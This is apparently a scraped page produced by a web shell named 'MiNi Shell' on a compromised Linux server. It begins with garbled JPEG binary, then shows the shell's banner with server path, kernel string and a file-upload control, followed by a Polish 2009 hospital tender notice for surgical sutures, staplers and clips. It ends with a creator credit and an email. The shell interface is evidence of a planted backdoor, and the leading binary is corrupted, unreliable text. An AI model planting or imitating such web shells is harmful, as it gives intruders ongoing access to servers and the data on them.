JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090522/162068-N-2009.html

<p class="kh_header"><b>Bielsko-Biała: Dostawa materiałów szewnych z podziałem na 8 Pakietów - ZP 14/2009</b><br>
<b>Numer ogłoszenia: 162068 - 2009; data zamieszczenia: 22.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Ogólny im. dr Edmunda Wojtyły , ul. Wyspiańskiego 26, 43-300 Bielsko-Biała, woj. śląskie, tel. 033 8272501, faks 033 8272505.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.bielsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów szewnych z podziałem na 8 Pakietów - ZP 14/2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia  oraz zapotrzebowane ilości zawierają formularze 
asortymentowo-cenowe -załącznik 1A  do 1H.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający  nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego mogą ubiegać 
                                                                        się wykonawcy nie wykluczeni na podstawie art. 24
                                                                        upzp którzy udokumentują stosownymi oświadcze-
                                                                        niami lub dokumentami, że  spełniają następujące 
                                                                        warunki:
A   Wymagania formalno-prawne :
  1.  spełniają warunki  określone w art.22 ust.1 ustawy Prawo Zamówień Publicznych:  
a)	posiadają uprawnienia niezbędne do wykonania przedmiotu zamówienia, jeżeli
     ustawy nakładają obowiązek posiadania takich uprawnień.
	        b)  posiadają  niezbędną wiedzę i doświadczenie oraz  dysponują  potencjałem technicznym 
	             i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie
	             innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykona-
	             nia  zamówienia, tj.
            - w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówie-
               nia,  a  jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  wykonali a w
 przypadku świadczeń okresowych lub ciągłych również wykonują nie mniej niż
             10 dostaw do Szpitali, odpowiadających swoim rodzajem i wartością dostawom stanowią-
             cym przedmiot zamówienia z podaniem ich wartości , przedmiotu, dat  wykonania i 
             odbiorców oraz załączą dokumenty potwierdzające, że dostawy te zostały wykonane 
              należycie, ze  szczególnym uwzględnieniem terminowości dostaw oraz przedstawieniem
              medycznej opinii   jakości - (załącznik nr 3 SIWZ).
c)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 
         d)  nie podlegają  wykluczeniu z postępowania o udzielenie zamówienia.         
    B   Pozostałe wymagania:
         1.  złożą oświadczenie o zapoznaniu się, akceptacji i przyjęciu bez zastrzeżeń  warunków 
              zawartych   w niniejszej specyfikacji wraz z jej załącznikami oraz zobowiążą się w przypadku 
              wyboru  ich oferty do zawarcia umowy w miejscu i terminie wyznaczonym przez 
              zamawiającego. 
         2.  przyjmują termin płatności nie krótszy niż 30 dni.
         3.  przedłożą aktualne  dokumenty i zaświadczenia wymagane w części V pkt C SIWZ, 
         4.  dołączą próbki oferowanego przedmiotu zamówienia zg. z  cz. IV pkt 5 SIWZ.
         5.  posiadają polisę ubezpieczenia od odpowiedzialności cywilnej z tytułu prowadzonej
          działalności gospodarczej na sumę gwarancyjną nie mniejszą niż 200 tyś zł.
      Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu: 
      Oceny spełnienia ww. warunków zamawiający dokona sprawdzając kompletność i poprawność
      złożonych dokumentów i oświadczeń, według zasady spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dla wymagań formalno prawnych
        1. aktualny  odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji 
          działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub
          zgłoszenia do ewidencji działalności gospodarczej w zakresie obejmującym przedmiot 
            zamówienia ( W przypadku wspólników spółek cywilnych - zaświadczenie o wpisie do 
           ewidencji  działalności gospodarczej każdego ze wspólników) - wystawione nie wcześ-
           niej niż 6 miesięcy przed  upływem terminu składania ofert.
Uwaga
        -  Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej 
           Polskiej, zamiast dokumentu o którym  mowa w pkt 1 składa dokument,  wystawiony w kraju,
           w którym ma siedzibę lub miejsce  zamieszkania, potwierdzający, że:  nie otwarto jego 
           likwidacji ani nie ogłoszono upadłości,
        - Jeżeli w kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce 
           zamieszkania, nie wydaje się dokumentu, o których mowa w pkt 1, zastępuje się go 
           dokumentem   zawierającym oświadczenie złożone przed notariuszem, właściwym organem
           sądowym,  administracyjnym albo organem samorządu zawodowego lub gospodarczego 
          odpowiednio kraju  pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub 
           miejsce  zamieszkania.
       -  Dokument, o których mowa w pkt 1  powinien być wystawiony nie wcześniej niż 6  miesięcy 
          przed upływem terminu składania ofert. 
      2.  odpis umowy regulującej współpracę podmiotów występujących wspólnie (jeżeli dotyczy),  
      3.  koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek posiadania koncesji, 
           zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym  
           zamówieniem,
      4.  oświadczenie potwierdzające spełnienie wszystkich warunków art.22 ust.1 oraz o nie 
           podleganiu wykluczeniu z postępowania na podstawie art.24, ust. 1 i 2 ustawy Prawo
           Zamówień Publicznych (załącznik nr 2 SIWZ), 
       5. kopia polisy ubezpieczenia od odpowiedzialności cywilnej z tytułu wykonywanej
        działalności gospodarczej na sumę gwarancyjną nie mniejszą niż 200 tyś zł.
Dla pozostałych wymagań
6.	wypełniony formularz ofertowy stanowiący kartę tytułową oferty (załącznik nr 1 SIWZ),
wybrany formularz asortymentowo-cenowy  dla oferowanych pakietów (załączniki  od 1A do 1H  SIWZ)  - w formie  pisemnej  i  dodatkowo elektronicznej (płyta CD).
         7. wykaz wykonywanych w okresie ostatnich trzech lat, przed dniem wszczęcia postępowania o 
             udzielenia zamówienia, a  jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
             wykonali a w przypadku świadczeń okresowych lub ciągłych również wykonują nie mniej niż
        10 dostaw do Szpitali,, odpowiadających swoim rodzajem i wartością dostawom stanowią-
        cym przedmiot zamówienia z podaniem ich wartości , przedmiotu, dat  wykonania i odbior-
        ców oraz załączą dokumenty potwierdzające, że dostawy te zostały wykonane należycie, ze
        szczególnym uwzględnieniem terminowości dostaw oraz przedstawieniem medycznej opinii
         jakości - (załącznik nr 3 SIWZ).
8.	 W celu potwierdzenia, bezpieczeństwa i jakości oferowanych wyrobów medycznych,
            Wykonawca   zobowiązany jest  załączyć do oferty następujące dokumenty: 
a)  Wpis lub zgłoszenie do Rejestru Wyrobów Medycznych i podmiotów odpowiedzialnych za
      ich  wprowadzenie do obrotu i używania (nie dotyczy klasy wyrobu medycznego I i IIa 
      pod  warunkiem,  że  pierwsze jego wprowadzenie nastąpiło w innym niż Polska kraju 
      Unii Europejskiej, zgodnie z  przepisami ustawy z dnia 20.04.2004r. o Wyrobach 
      Medycznych)  - z zastrzeżeniem pkt. 8.1
b)  Certyfikat EC producenta ( nie dotyczy klasy I niesterylnej wyrobu medycznego )- 
      z zastrzeżeniem pkt. 8.1
     W przypadku wątpliwości Zamawiający będzie wymagał pod rygorem nieważności  certyfi-
      katu   jednostki  notyfikującej.
c)  Deklaracja Zgodności.
d)  Ulotki informacyjne o produkcie.
  e)  Katalog.
       W przypadku uzasadnionych wątpliwości Zamawiający może zażądać przedstawienia 
        oryginału lub notarialnie poświadczonej kopii dokumentu.

       Zamawiający będzie oczekiwał wpisu lub zgłoszenia do Rejestru Wyrobów Medycznych i
       podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania, oraz certyfikatu 
       EC z Deklaracją Zgodności (zgodnie z klasą).

       8.1 W przypadku braku wpisu lub zgłoszenia do Rejestru Wyrobów Medycznych i podmiotów 
             odpowiedzialnych za ich wprowadzenie do obrotu i używania, do oferty należy dołączyć 
             certyfikat EC wraz z  Deklaracją Zgodności (zgodnie z klasą). 
      8.2. Dokumenty, o których mowa w punkcie 8 ppkt. a-d winny być umieszczone w ofercie 
             przetargowej w miejscu pod danym pakietem, którego dotyczą i powinny być opisane w 
             następujący sposób:
     W prawym górnym rogu dokumentu należy wpisać numer pakietu i numer pozycji danego
     pakietu . Przykład : (Dotyczy Pakietu nr : 00 pozycja nr : 00)

           Załączone dokumenty muszą w jednoznaczny sposób potwierdzać spełnienie wymagań 
           postawionych przez Zamawiającego.
       9. oświadczenia wykonawcy o:   (zawartych na druku OFERTA załącznik nr 1 SIWZ)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 65</li>
<li>2 - Jakość - Pakiet I,II,III,IV-dla pozostałych pakietów jak w załączniku - 35</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.szpital.bielsko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba zamawiającego -cena  10,00 zł); opłata przelewem lub gotówką w siedzibie zamawiającego. Cena dotyczy zakupu dokumentów nie pobieranych ze strony internetowej zamawiającego..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2009 godzina 10:00, miejsce: Siedziba Zamawiającego - Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet I.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szwy  wchłanialne					- załącznik 1 A do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet II.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szwy  niewchłanialne					- załącznik 1 B do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet III.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ładunki do staplerów wielorazowych			- załącznik 1 C do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet IV.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Staplery jednorazowe					- załącznik  1 D do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet V.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestawy jednorazowego użytku do operacji 
                               pochwowych i przepuklin				- załącznik 1 E do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet VI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Klips tytanowy						- załącznik 1 F do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet VII.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw szwu stalowego kiluwłóknowego		- załącznik 1 G do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet VIII.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Oprzyrządowanie jednorazowego użytku 
                               do urządzenia LIGASURE				- załącznik 1 H do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com